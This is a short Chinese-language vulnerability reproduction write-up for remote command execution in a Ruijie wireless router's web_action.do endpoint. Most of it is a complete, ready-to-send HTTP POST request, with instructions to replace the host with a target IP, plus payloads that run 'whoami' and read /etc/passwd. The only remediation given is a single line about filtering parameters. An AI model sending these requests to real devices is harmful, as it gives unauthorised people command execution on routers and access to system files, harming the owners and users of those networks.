警告:本文所涉及内容只可用于交流学习,请勿使用本文提到的内容违反法律,本文和作者不提供任何担保!!!
一、漏洞信息
此漏洞是因为锐捷无线路由未对数据包中的敏感参数做过滤,可直接利用action参数,导致RCE。
二、漏洞复现
漏洞url:http://123.123.123.123/web_action.do
使用下面的数据包,更改host为目标ip,Referer不用改
POST /web_action.do HTTP/1.1
Host: 123.123.123.123
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/
Content-Length: 29
Cookie: LOCAL_LANG_COOKIE=zh; UI_LOCAL_COOKIE=zh; SID=F23E18BDA014D308240A53206BEAD58; login=1; mac=0074.9c2b.472c; oid=
Connection: close
action=shell&command=whoami
发现回显,漏洞存在。
使用第二个poc查看信息。
Poc2: action=shell&command=cat+/etc/passwd
三、修复建议
过滤相关参数